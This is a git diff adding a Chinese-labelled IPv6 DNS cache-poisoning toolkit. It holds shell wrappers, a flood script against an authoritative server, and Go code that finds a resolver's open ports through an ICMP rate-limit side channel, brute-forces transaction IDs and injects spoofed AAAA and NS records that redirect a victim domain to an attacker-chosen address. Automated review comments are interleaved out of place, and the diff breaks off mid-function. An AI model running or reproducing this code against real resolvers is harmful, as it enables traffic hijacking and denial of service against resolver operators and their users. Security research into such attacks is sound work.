Diffstat (limited to 'att script/4_v6_注入/code')
| -rw-r--r-- | att script/4_v6_注入/code/attack.sh | 3 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/dns_OPT.bin | bin | 0 -> 11 bytes | |||
| -rw-r--r-- | att script/4_v6_注入/code/dns_end.bin | bin | 0 -> 5 bytes | |||
| -rw-r--r-- | att script/4_v6_注入/code/dns_query.sh | 8 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/dns_start.bin | bin | 0 -> 10 bytes | |||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/attack.go | 685 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/dns.go | 261 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/go.mod | 15 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/go.sum | 25 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/ipv6util.go | 103 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/fakedns6/library.go | 171 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/flood/go.mod | 20 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/flood/go.sum | 38 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/flood/ipv6util.go | 103 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/src/flood/main.go | 192 | ||||
| -rw-r--r-- | att script/4_v6_注入/code/start.sh | 38 |
16 files changed, 1662 insertions, 0 deletions
diff --git a/att script/4_v6_注入/code/attack.sh b/att script/4_v6_注入/code/attack.sh
new file mode 100644
index 0000000..d67ca19
--- /dev/null
+++ b/att script/4_v6_注入/code/attack.sh
@@ -0,0 +1,3 @@
+chmod 777 ./start.sh
+chmod 777 ./dns_query.sh
+./start.sh $1 $2 $3 $4 $5
\ No newline at end of file
diff --git a/att script/4_v6_注入/code/dns_OPT.bin b/att script/4_v6_注入/code/dns_OPT.bin
Binary files differ
new file mode 100644
index 0000000..e0dcbc1
--- /dev/null
+++ b/att script/4_v6_注入/code/dns_OPT.bin
diff --git a/att script/4_v6_注入/code/dns_end.bin b/att script/4_v6_注入/code/dns_end.bin
Binary files differ
new file mode 100644
index 0000000..8aa4774
--- /dev/null
+++ b/att script/4_v6_注入/code/dns_end.bin
diff --git a/att script/4_v6_注入/code/dns_query.sh b/att script/4_v6_注入/code/dns_query.sh
new file mode 100644
index 0000000..dbc0266
--- /dev/null
+++ b/att script/4_v6_注入/code/dns_query.sh
@@ -0,0 +1,8 @@
+# usage ./dns_query.sh [NS IP] [Resolver IP(spoofed as source IP)] domain... (e.g. www google com)
+# write the domain name into the binary
+echo "初始化工具环境"
+# change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
+# fire!
+go version
+echo "尝试触发权威服务器请求速率限制"
+./flood -i $4 -saddr $2 -taddr $1 -q $3
diff --git a/att script/4_v6_注入/code/dns_start.bin b/att script/4_v6_注入/code/dns_start.bin
Binary files differ
new file mode 100644
index 0000000..e6e4242
--- /dev/null
+++ b/att script/4_v6_注入/code/dns_start.bin
diff --git a/att script/4_v6_注入/code/src/fakedns6/attack.go b/att script/4_v6_注入/code/src/fakedns6/attack.go
new file mode 100644
index 0000000..6cc6f87
--- /dev/null
+++ b/att script/4_v6_注入/code/src/fakedns6/attack.go
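Review bot: `chmod 777` on both scripts makes them world-writable, which is broader than the wrapper needs and lets any local account rewrite a script that this wrapper then executes with the caller's privileges; execute permission is all the next line requires. Use `chmod 755 ./start.sh` and `chmod 755 ./dns_query.sh` instead (or `chmod +x`, which leaves the existing write bits alone). The same `777` pattern should be checked in start.sh, which is listed in the diffstat but not shown in this chunk.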
@@ -0,0 +1,685 @@ +package main + +import ( + "flag" + "fmt" + "github.com/google/gopacket" + "log" + "math/rand" + "net" + "os" + "strconv" + "sync" + "time" + + "github.com/google/gopacket/layers" + "github.com/google/gopacket/pcap" + "github.com/google/gopacket/routing" +) + +var handle *pcap.Handle +var ethernetLayer *layers.Ethernet +var victimDNSName string +var dnsQueryName string +var authIP net.IP +var resolverIP net.IP +var localIP []net.IP +var defaultJitter uint +var gotReply = false +var attackerControlledDomain string +var attackForwarder bool +var repeatTimes int +var timeGap uint +var attTargetAddr string +var soaName string + +var jitter uint = 10 +var rtt uint = 1 // in ms +var debugOutput = true + +const GROUP_SIZE = 50 + +/* I'm not sure what's this used for. Probably used with older version where multiple IPs is not supported. */ +//var sendingChannel chan *outgoingPacket +var backendResolvers = make([]*backendResolver, 0) +var bruteForceShouldBeKilled = false + +type backendResolver = struct { + resolverBackendIP net.IP + + // [端口组ID][端口] + groups [][]uint16 // = make([][]uint16, 65536) + groupIDCounter uint32 // = 3 + groupIDCounterLock *sync.Mutex + groupSendTime []time.Time // = make([]time.Time, 65536) + + probeChannel chan uint32 //= make(chan uint16, 655) + priorityProbeChannel chan uint32 //= make(chan uint16, 655) + alwaysOpenPorts []bool //= make([]bool, 65536) + + perIPLimitCounter []int //= 6 + + networkXmitLock *sync.Mutex +} + +// timeout in ms, 持续触发查询请求 +func dnsRequestSender(timeout uint) { + for { + gotReply = false + sendDNSRequest(uint16(rand.Uint32()), dnsQueryName) + retryTimes := timeout / 500 + for { + if !gotReply { + time.Sleep(500 * time.Millisecond) + retryTimes-- + if retryTimes == 0 { + break + } + } else { + if debugOutput { + fmt.Println("接收到响应 ", timeout-retryTimes*500, "ms") + } else { + fmt.Println("Rx") + } + break + } + } + if !attackForwarder { + //dnsQueryName = strconv.Itoa(rand.Int()) + "." 
+ victimDNSName + dnsQueryName = victimDNSName + } else { + /* I'm not sure if we should change the nonce. */ + dnsQueryName = strconv.Itoa(rand.Int()) + "." + attackerControlledDomain + } + } +} + +func receivingThread() { + for { + data, captureInfo, err := handle.ReadPacketData() + if err == pcap.NextErrorTimeoutExpired { + continue + } else if err != nil { + log.Printf("error reading packet: %v", err) + continue + } + + // Parse the packet. We'd use DecodingLayerParser here if we + // wanted to be really fast. + packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy) + + // Find the packets we care about, and print out logging + // information about them. All others are ignored. + if rspNet := packet.NetworkLayer(); rspNet == nil { + continue + } else if rspIPLayer := packet.Layer(layers.LayerTypeIPv6); rspIPLayer == nil { + continue + //} else if rspIP := rspIPLayer.(*layers.IPv4); rspIP == nil { + } else if rspIP := rspIPLayer.(*layers.IPv6); rspIP == nil { + continue + } else if rspIP.NextHeader != layers.IPProtocolICMPv6 { + if rspIP.FlowLabel != 2 && rspIP.NextHeader == layers.IPProtocolUDP && compareIPv6Addr(rspIP.SrcIP, resolverIP) == 0 { + rspUDPLayer := packet.Layer(layers.LayerTypeUDP) + if rspUDPLayer != nil && rspUDPLayer.(*layers.UDP).SrcPort == 53 { + rspDNSLayer := packet.Layer(layers.LayerTypeDNS) + if rspDNSLayer != nil { + rspDNS := rspDNSLayer.(*layers.DNS) + if rspDNS.QR == true { + if len(rspDNS.Authorities) != 0 && rspDNS.ResponseCode == layers.DNSResponseCodeNXDomain && string(rspDNS.Questions[0].Name) == dnsQueryName && + string(rspDNS.Authorities[0].Name) == victimDNSName && string(rspDNS.Authorities[0].SOA.MName) == soaName { + fmt.Println("Success!!") + os.Exit(0) + } else if string(rspDNS.Questions[0].Name) == dnsQueryName && rspDNS.ResponseCode == layers.DNSResponseCodeNoErr { + for _, record := range rspDNS.Answers { + if record.Type == layers.DNSTypeAAAA { + fmt.Println("AAAA记录修改成功!!") + os.Exit(0) + } + } + 
} else if string(rspDNS.Questions[0].Name) == dnsQueryName { + gotReply = true + } + } + } + } + } + continue + } else if rspICMPLayer := packet.Layer(layers.LayerTypeICMPv6); rspICMPLayer == nil { + continue + } else if rspICMP, ok := rspICMPLayer.(*layers.ICMPv6); !ok { + continue + } else if rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodePortUnreachable) && + rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodeAdminProhibited) { + continue + } else if nestedIpData := rspICMP.Payload; nestedIpData == nil { + continue + } else if nestedIpPacket := gopacket.NewPacket(nestedIpData, layers.LayerTypeIPv6, gopacket.NoCopy); nestedIpPacket == nil { + continue + } else if nestedIpLayer := nestedIpPacket.Layer(layers.LayerTypeIPv6); nestedIpLayer == nil { + continue + } else if nestedIp := nestedIpLayer.(*layers.IPv6); nestedIp == nil { + continue + } else { + r := getBackendResolver(nestedIp.DstIP) + if r != nil { + + nestedUDPLayer := nestedIpPacket.Layer(layers.LayerTypeUDP) + if nestedUDPLayer == nil { + fmt.Println("nestedUDPLayer == nil") + continue + } + nestedUDP := nestedUDPLayer.(*layers.UDP) + if nestedUDP == nil { + fmt.Println("nestedUDP == nil") + continue + } + + //got verification packet back + if nestedIp.FlowLabel > 1 { + //update rtt + /* Potential BUG: rtt of both resolver may not be the same. 
*/ + newrtt := captureInfo.Timestamp.Sub(r.groupSendTime[nestedIp.FlowLabel]).Nanoseconds()/1000000 + 1 + if newrtt >= 0 && newrtt < 5000 { + var draftJitter uint = 0 + if uint(newrtt) > rtt { + draftJitter = uint(newrtt) - rtt + } else { + draftJitter = (jitter + (rtt - uint(newrtt))) / 2 + } + if jitter > 30 { + fmt.Println("Jitter > 30ms!") + jitter = 10 + } else { + jitter = draftJitter + } + rtt = uint(newrtt) + if debugOutput { + fmt.Println("rtt=", rtt, ", jitter=", jitter) + } + } else { + fmt.Println("newrtt error:", newrtt) + } + //reduce ratelimit counter + localIPNum := getLocalIPNum(nestedIp.SrcIP) + if localIPNum != -1 { + if r.perIPLimitCounter[localIPNum] >= 0 { + r.perIPLimitCounter[localIPNum]-- + } + if r.perIPLimitCounter[localIPNum] < 0 { + if debugOutput { + /* This may happen in real attacks. Don't panic :). */ + fmt.Println(r.resolverBackendIP, "bug: perIPLimitCounter < 0") + } + } + if debugOutput { + fmt.Println(r.resolverBackendIP, "remaining counter:", localIPNum, r.perIPLimitCounter[localIPNum]) + } + } else { + if debugOutput { + fmt.Println("received unwanted ICMP for", nestedIp.SrcIP) + } + } + //process the packet + binarySearch(r, nestedIp.FlowLabel) + } + } + } + } +} + +func binarySearch(r *backendResolver, flowlabel uint32) { + groupLen := 0 + group := r.groups[flowlabel] + + for _, port := range group { + if port != 65535 { + groupLen++ + } else { + break + } + } + + if groupLen == 1 { + //brute force + r.networkXmitLock.Lock() + fmt.Println("猜测开放端口为: " + strconv.Itoa(int(group[0]))) + dnsBruteForce(group[0], timeGap, r.resolverBackendIP, attTargetAddr) + r.networkXmitLock.Unlock() + r.alwaysOpenPorts[group[0]] = true + } else if groupLen > 1 { + var repeatTimes1 int + if repeatTimes > 1 { + repeatTimes1 = repeatTimes + 1 + } else { + repeatTimes1 = 1 + } + for j := 0; j < repeatTimes1; j++ { + //二分法定位开放端口 + //left + id := allocateGroupID(r) + r.groups[id] = make([]uint16, groupLen/2) + copy(r.groups[id], group[0:groupLen/2]) + 
for len(r.groups[id]) < GROUP_SIZE { + r.groups[id] = append(r.groups[id], 65535) + } + if debugOutput { + fmt.Println(r.resolverBackendIP, "bs", r.groups[id][0], "+", groupLen/2) + } else { + fmt.Println("Found something interesting!") + } + r.priorityProbeChannel <- flowlabel + + //right + id = allocateGroupID(r) + r.groups[id] = make([]uint16, groupLen-groupLen/2) + copy(r.groups[id], group[groupLen/2:groupLen]) + for len(r.groups[id]) < GROUP_SIZE { + r.groups[id] = append(r.groups[id], 65535) + } + //fmt.Println(r.resolverBackendIP, "bsr", r.groups[id][0], "+", groupLen-groupLen/2) + r.priorityProbeChannel <- flowlabel + } + } else { + if debugOutput { + fmt.Println(r.resolverBackendIP, "bug: groupLen <= 0, id=", flowlabel) + for _, port := range group { + fmt.Print(port) + } + } + } +} + +func perIPLimitRecover(r *backendResolver, num int) { + for { + if r.perIPLimitCounter[num] < 6 { + time.Sleep(time.Second + (time.Duration(defaultJitter)+50)*time.Millisecond) + r.perIPLimitCounter[num]++ + } else { + time.Sleep((time.Duration(defaultJitter) + 1) * time.Millisecond) + } + } +} + +func probeSender(r *backendResolver) { + for { + + var flow uint32 + select { + case flow = <-r.priorityProbeChannel: + break + case flow = <-r.probeChannel: + break + //default: + // time.Sleep(time.Microsecond) + } + + // 当所有IP都测试过且端口组中只有一个端口时,进行TXID暴力破解 + if getIPwithAvailableCounter(r) == nil && r.groups[flow][1] == 65535 { + //brute force + fmt.Println("猜测开放端口为:" + strconv.Itoa(int(r.groups[flow][0]))) + fmt.Println("开始爆破事务ID") + r.networkXmitLock.Lock() + dnsBruteForce(r.groups[flow][0], timeGap, r.resolverBackendIP, attTargetAddr) + r.networkXmitLock.Unlock() + r.alwaysOpenPorts[r.groups[flow][0]] = true + continue + } + // 测试每个IP的速率限制 + var verifyIP net.IP + for { + verifyIP = getIPwithAvailableCounter(r) + if verifyIP == nil { + time.Sleep(time.Millisecond) + } else { + break + } + } + + //send + ports := r.groups[flow] + r.networkXmitLock.Lock() + for i := 0; i < 
GROUP_SIZE; i++ { + if defaultJitter <= 3 { + if attackForwarder { + xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), flow, 100) + } else { + xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), flow, 1) + } + } else { + xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), flow, 0) + } + } + time.Sleep(time.Duration(defaultJitter) * time.Millisecond) + // 验证 + xmitUDPv6(verifyIP, r.resolverBackendIP, 53, 65535, flow, 10) + r.groupSendTime[flow] = time.Now() + if rand.Uint32()%100 < 2 { + if debugOutput { + fmt.Println("目标"+r.resolverBackendIP.String(), "探测中", "当前端口范围"+strconv.Itoa(int(ports[0]))+"~~"+strconv.Itoa(int(ports[0]+49))) + } else { + fmt.Println("开放端口猜测中,请稍后...") + } + } + + // 等待全局计数器恢复 + if !attackForwarder { + time.Sleep(time.Duration(60-defaultJitter) * time.Millisecond) + } else { + /* IDK why I wrote this line. Forwarders should be the same as resolvers if they support global rate limit. */ + time.Sleep(time.Duration(60) * time.Millisecond) + } + r.networkXmitLock.Unlock() + } +} + +// 划分端口 +func portGroupFormer(r *backendResolver, startPort uint, endPort uint) { + for { + //divide into groups + var id uint32 = 0 + var currentGroupSize = 0 + + for i := startPort; i <= endPort; i++ { + // 端口不太可能用于进一步的查询。但这仍然是可能的。如果觉得端口重用不太可能发生,请在这里取消注释 + if r.alwaysOpenPorts[i] { + continue + } + if currentGroupSize%GROUP_SIZE == 0 { + if id != 0 { + r.probeChannel <- id + for j := 1; j < repeatTimes; j++ { + //dup + previd := id + id = allocateGroupID(r) + r.groups[id] = make([]uint16, len(r.groups[previd])) + copy(r.groups[id], r.groups[previd]) + r.probeChannel <- id + } + } + + id = allocateGroupID(r) + r.groups[id] = make([]uint16, 0) + } + + r.groups[id] = append(r.groups[id], uint16(i)) + currentGroupSize++ + } + + //deal with last several cases + if /*len(r.groups[id]) != 50 &&*/ len(r.groups[id]) != 0 { + for len(r.groups[id]) != 50 && len(r.groups[id]) != 0 { + r.groups[id] = append(r.groups[id], 65535) + 
} + + r.probeChannel <- id + + for j := 1; j < repeatTimes; j++ { + //dup + previd := id + id = allocateGroupID(r) + r.groups[id] = make([]uint16, len(r.groups[previd])) + copy(r.groups[id], r.groups[previd]) + r.probeChannel <- id + } + } + } +} + +func main() { + + /* This program only finds & injects DNS responses automatically. Additional authoritative server muting/flooding scripts are needed. */ + /* IPv4 is not supported yet. */ + /* Use "-h to get usage. " */ + /* Attaching PoC? */ + /* Add Paper Bio? */ + ifaceName := flag.String("i", "vmnet1", "Interface for attacking. Multiple interfaces are not supported. Multiple IPs per interface is supported.") + /* If automatic MAC address discovery doesn't work. consider enable this option and feed it to the MAC field. */ + // gateWayMacStr := flag.String("g", "00:11:22:33:44:55", "Gateway Mac") + authServer := flag.String("a", "", "Authoritative server for the domain to be poisoned.") + resolver := flag.String("r", "8.8.8.8", "Front-end IP of the victim resolver.") + resolverBackend := flag.String("b", "", "Back-end IP of the victim resolver.") + resolverBackendList := flag.String("bn", "", "Back-end IP list of the victim resolver. One per line. This would overwrite \"-b\" and is used when the server has multiple backend IPs.") + startPort := flag.Uint("s", 1, "Lowest port # for the port scan range, inclusive.") + endPort := flag.Uint("e", 65534, "Highest port # for the port scan range, inclusive.") + victimDNSName := flag.String("n", "", "The domain name to be poisoned.") + dnsQueryTimeout := flag.Uint("t", 4000, "Timeout in ms for outgoing dns queries to the victim resolver. Should be aligned with the resolver's timeout (e.g., BIND is 10000ms by default).") + defaultJitter := flag.Uint("j", 5, "Time gap between verification packet and the latest probe packet in a group. 
Increase the value if Jitter is increased.") + repeatTimes := flag.Int("R", 1, "Retransmit/Reprobe a group of ports for X times to reduce FNs.") + timeGap := flag.Uint("tg", 0, "Time gap is us(microseconds) between the TxID brute force packets.") + attTargetAddr := flag.String("ad", "", "想要篡改实现的结果") + debugOutput := flag.Bool("d", false, "调试输出模式.") + attackerMaliciousDomain := flag.String("f", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.") + soaName = *flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)") + + flag.Parse() + fmt.Println("侧信道脚本工作参数:") + fmt.Println("\t网络接口:" + *ifaceName) + fmt.Println("\t目标域名权威服务器地址:" + *authServer) + fmt.Println("\t目标服务器地址:" + *resolverBackend) + fmt.Println("\t目标域名:" + *victimDNSName) + fmt.Println("\t预期修改结果:" + *attTargetAddr) + //gatewayMac, _ := net.ParseMAC(*gateWayMacStr) + Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTimeout, *defaultJitter, + *attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *attTargetAddr, soaName) + os.Exit(0) +} + +func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint, + defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg int, timeGapArg uint, attTargetAddrArg string, + soaNameArg string) { + rand.Seed(time.Now().UnixNano()) + + handle, _ = pcap.OpenLive( + ifaceName, + 65536, + true, + pcap.BlockForever, + ) + err := handle.SetBPFFilter("not host " + authIPArg.To16().String()) + if err != nil { + fmt.Println("cannot set BPF filter.") + } + + iface, err := net.InterfaceByName(ifaceName) + if err != nil { + 
fmt.Println("cannot open network interface") + os.Exit(1) + } + // 是否攻击转发器 + if attackerMaliciousDomainArg != "" { + attackForwarder = true + fmt.Println("转发器攻击模式!") + attackerControlledDomain = attackerMaliciousDomainArg + } + + // 参数赋值 + authIP = authIPArg + resolverIP = resolverIPArg + victimDNSName = victimDNSNameArg + debugOutput = debugOutputArg + timeGap = timeGapArg + attTargetAddr = attTargetAddrArg + soaName = soaNameArg + + localIP, _ = GetIfaceAddrMulti(iface) + nonce := strconv.Itoa(rand.Int()) + + if !attackForwarder { + //dnsQueryName = nonce + "." + victimDNSName + dnsQueryName = victimDNSName + } else { + dnsQueryName = nonce + "." + attackerControlledDomain + } + + defaultJitter = defaultJitterArg + repeatTimes = repeatTimesArg + + if resolverBackendList != "" { + file, err := os.Open(resolverBackendList) + if err != nil { + fmt.Println(err) + os.Exit(10) + } + for { + var resolverIP string + n, err := fmt.Fscanf(file, "%s", &resolverIP) + if n <= 0 || err != nil { + break + } + backendResolvers = append(backendResolvers, backendResolverBuilder(net.ParseIP(resolverIP))) + } + } else { + //r1 shouldn't be nil + r1 := backendResolverBuilder(resolverBackendIPArg) + backendResolvers = append(backendResolvers, r1) + } + + //figure out MAC address + //test if it's in LAN first + // dstMac, err := GetGatewayAddr(iface, handle, backendResolvers[0].resolverBackendIP.To16()) + gwIP, err := getv6Gateway() + dstMac, err := getGatewayV6Mac(ifaceName, gwIP) + if err == nil { + ethernetLayer = &layers.Ethernet{ + SrcMAC: iface.HardwareAddr, + DstMAC: dstMac, + //EthernetType: layers.EthernetTypeIPv4, + EthernetType: layers.EthernetTypeIPv6, + } + fmt.Println("\t目的Mac地址为:", dstMac) + } else { + //query routing table + router, err := routing.New() + if err != nil { + fmt.Println(err) + os.Exit(4) + } + _, nextHopIP, _, err := router.Route(backendResolvers[0].resolverBackendIP) + if err != nil { + fmt.Println(err) + os.Exit(5) + } + dstMac, err := 
GetGatewayAddr(iface, handle, nextHopIP.To16()) + if err != nil { + fmt.Println(err) + os.Exit(6) + } + fmt.Println("MAC:", dstMac) + ethernetLayer = &layers.Ethernet{ + SrcMAC: iface.HardwareAddr, + DstMAC: dstMac, + //EthernetType: layers.EthernetTypeIPv4, + EthernetType: layers.EthernetTypeIPv6, + } + } + + // 开启接收线程,处理响应包判断攻击状态 + go receivingThread() + + for i, ip := range localIP { + // 只使用公网IP + if !ip.IsLoopback() { + if debugOutput { + fmt.Println("可用 IP", ip) + } + for _, r := range backendResolvers { + go perIPLimitRecover(r, i) + } + } + } + // 发送dns查询请求,触发端口开放 + go dnsRequestSender(dnsQueryTimeout) + + for _, r := range backendResolvers { + // 猜测端口 + go probeSender(r) + // 端口范围组合 + go portGroupFormer(r, startPort, endPort) + time.Sleep(25 * time.Millisecond) + } + + time.Sleep(999 * time.Hour) + +} + +func allocateGroupID(r *backendResolver) uint32 { + r.groupIDCounterLock.Lock() + id := r.groupIDCounter + r.groupIDCounter++ + if r.groupIDCounter == 0 { + r.groupIDCounter = 3 + } + r.groupIDCounterLock.Unlock() + return id +} + +func getBackendResolver(resolverIP net.IP) *backendResolver { + for _, r := range backendResolvers { + if compareIPv6Addr(r.resolverBackendIP, resolverIP) == 0 { + return r + } + } + return nil +} + +func lockNetwork() { + for _, r := range backendResolvers { + r.networkXmitLock.Lock() + } +} + +func unlockNetwork() { + for _, r := range backendResolvers { + r.networkXmitLock.Unlock() + } +} + +func getLocalIPNum(ip net.IP) int { + for i, localip := range localIP { + if compareIPv6Addr(localip, ip) == 0 { + return i + } + } + return -1 +} + +func backendResolverBuilder(backendIP net.IP) *backendResolver { + + if backendIP == nil { + return nil + } + temp := backendResolver{ + resolverBackendIP: backendIP, + groups: make([][]uint16, 65536), + groupIDCounter: 3, + groupIDCounterLock: &sync.Mutex{}, + groupSendTime: make([]time.Time, 65536), + probeChannel: make(chan uint32, 655), + priorityProbeChannel: make(chan uint32, 655), + 
alwaysOpenPorts: make([]bool, 65536), + perIPLimitCounter: make([]int, len(localIP)), + networkXmitLock: &sync.Mutex{}, + } + for i := range temp.perIPLimitCounter { + temp.perIPLimitCounter[i] = 6 + } + for i := 0; i < 65536; i++ { + temp.alwaysOpenPorts[i] = false + } + temp.alwaysOpenPorts[53] = true + temp.alwaysOpenPorts[0] = true + temp.alwaysOpenPorts[65535] = true + return &temp + +} + +// distribute verification to multiple IPs evenly +func getIPwithAvailableCounter(r *backendResolver) net.IP { + seed := rand.Int() % len(localIP) + for i := 0; i < len(localIP); i++ { + if r.perIPLimitCounter[(i+seed)%len(localIP)] > 0 { + return localIP[(i+seed)%len(localIP)] + } + } + return nil +} diff --git a/att script/4_v6_注入/code/src/fakedns6/dns.go b/att script/4_v6_注入/code/src/fakedns6/dns.go new file mode 100644 index 0000000..c29f9f9 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/dns.go 
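Review bot: In `Main`, `handle, _ = pcap.OpenLive(...)` discards the open error, so an unknown interface name or a missing capture privilege is not reported and instead surfaces as a nil-pointer panic on the next line, `handle.SetBPFFilter(...)`. Because `handle` is a package-level variable, the fix needs an assignment rather than `:=`: `var err error`, `handle, err = pcap.OpenLive(ifaceName, 65536, true, pcap.BlockForever)`, `if err != nil { log.Fatalf("opening capture on %s: %v", ifaceName, err) }`, with the following `err := handle.SetBPFFilter(...)` becoming `err =`. Two smaller instances of the same pattern sit further down in `Main`: the `err` from `gwIP, err := getv6Gateway()` is overwritten by the next `:=` before it is examined, and the `file` opened for `-bn` is never closed (`defer file.Close()` after the open check).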
@@ -0,0 +1,261 @@ +package main + +import ( + "fmt" + "math/rand" + "net" + "time" + + "github.com/google/gopacket/layers" +) + +var bruteForceCouldBeKilled bool + +func sendDNSRequest(id uint16, name string) { + if debugOutput { + fmt.Println("Send new DNS request", name, id) + } + _sendDNSRequest(id, name, localIP[0], resolverIP, (layers.UDPPort)(rand.Uint32()), 53) +} + +func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) { + ipLayer := layers.IPv6{ + FlowLabel: 1, + SrcIP: src, + DstIP: dst, + Version: 6, + HopLimit: 64, + NextHeader: layers.IPProtocolUDP, + //Flags: layers.IPv4DontFragment, + } + udpLayer := layers.UDP{ + SrcPort: sport, + DstPort: dport, + } + dnsLayer := layers.DNS{ + ID: id, + QR: false, + OpCode: 0, + AA: false, + TC: false, + RD: true, + RA: false, + Z: 0, + ResponseCode: 0, + QDCount: 1, + ANCount: 0, + NSCount: 0, + ARCount: 0, + Questions: []layers.DNSQuestion{{ + Name: []byte(name), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + }}, + Authorities: nil, + Additionals: nil, + } + err := udpLayer.SetNetworkLayerForChecksum(&ipLayer) + if err != nil { + fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err) + } + err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ sendDNSRequest: ", err) + } +} + +func bruteForceTerminatingTimer(timegap uint) { + time.Sleep(time.Duration(timegap) * time.Millisecond) + bruteForceCouldBeKilled = true +} + +func dnsBruteForce(targetPort uint16, timegap uint, resolverBackendIP net.IP, attTargetAddr string) { + bruteForceShouldBeKilled = true + bruteForceCouldBeKilled = false + ipLayer := layers.IPv6{ + FlowLabel: 2, + SrcIP: authIP, + DstIP: resolverBackendIP, + Version: 6, + HopLimit: 64, + NextHeader: layers.IPProtocolUDP, + //Flags: layers.IPv4DontFragment, + } + udpLayer := layers.UDP{ + SrcPort: 53, + DstPort: layers.UDPPort(targetPort), + } + 
dnsLayer := layers.DNS{ + ID: 0, + QR: true, + OpCode: 0, + AA: true, + TC: false, + RD: false, + RA: false, + Z: 0, + ResponseCode: layers.DNSResponseCodeNoErr, + } + + if !attackForwarder { + dnsLayer.Questions = []layers.DNSQuestion{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + }} + // 原方案:将域名NS篡改到attacker的服务器上 + //dnsLayer.Authorities = []layers.DNSResourceRecord{{ + // Name: []byte(victimDNSName), + // Type: layers.DNSTypeNS, + // Class: layers.DNSClassIN, + // TTL: 300, + // IP: nil, + // NS: []byte(auxDomain), + // CNAME: nil, + // PTR: nil, + // TXTs: nil, + // SOA: layers.DNSSOA{}, + // SRV: layers.DNSSRV{}, + // MX: layers.DNSMX{}, + // OPT: nil, + // TXT: nil, + //}} + //dnsLayer.Answers = nil + //dnsLayer.Additionals = nil + dnsLayer.Authorities = []layers.DNSResourceRecord{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeNS, + Class: layers.DNSClassIN, + TTL: 300, + IP: nil, + // 暂时写死 + NS: []byte("nsv6.n64.top"), + CNAME: nil, + PTR: nil, + TXTs: nil, + SOA: layers.DNSSOA{}, + SRV: layers.DNSSRV{}, + MX: layers.DNSMX{}, + OPT: nil, + TXT: nil, + }} + dnsLayer.Answers = []layers.DNSResourceRecord{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + TTL: 300, + /* Fill with any IP you want. The victim domain will be hijacked to this IP. */ + IP: net.ParseIP(attTargetAddr), + NS: nil, + CNAME: nil, + PTR: nil, + TXTs: nil, + SOA: layers.DNSSOA{}, + SRV: layers.DNSSRV{}, + MX: layers.DNSMX{}, + OPT: nil, + TXT: nil, + }} + dnsLayer.Additionals = nil + } else { + /* Change these flags accordingly to the request sent by the resolver. 
*/ + dnsLayer.AA = false + dnsLayer.RD = true + dnsLayer.RA = true + dnsLayer.Questions = []layers.DNSQuestion{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + }} + dnsLayer.Answers = []layers.DNSResourceRecord{{ + Name: []byte(dnsQueryName), + Type: layers.DNSTypeCNAME, + Class: layers.DNSClassIN, + TTL: 300, + IP: nil, + NS: nil, + CNAME: []byte(victimDNSName), + PTR: nil, + TXTs: nil, + SOA: layers.DNSSOA{}, + SRV: layers.DNSSRV{}, + MX: layers.DNSMX{}, + OPT: nil, + TXT: nil, + }, { + Name: []byte(victimDNSName), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + TTL: 300, + /* Fill with any IP you want. The victim domain will be hijacked to this IP. */ + IP: net.ParseIP(attTargetAddr), + NS: nil, + CNAME: nil, + PTR: nil, + TXTs: nil, + SOA: layers.DNSSOA{}, + SRV: layers.DNSSRV{}, + MX: layers.DNSMX{}, + OPT: nil, + TXT: nil, + }} + } + + err := udpLayer.SetNetworkLayerForChecksum(&ipLayer) + if err != nil { + fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go error", err) + } + if debugOutput { + fmt.Println("DNS BruteForce: ", targetPort) + } + + startTime := time.Now() + var txid uint16 + //try to see if this port is open in reality + for txid = 0; txid < GROUP_SIZE*2; txid++ { + dnsLayer.ID = txid + err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ sendDNSRequest pos 1: ", err) + } + time.Sleep(time.Duration(timegap) * time.Microsecond) + } + 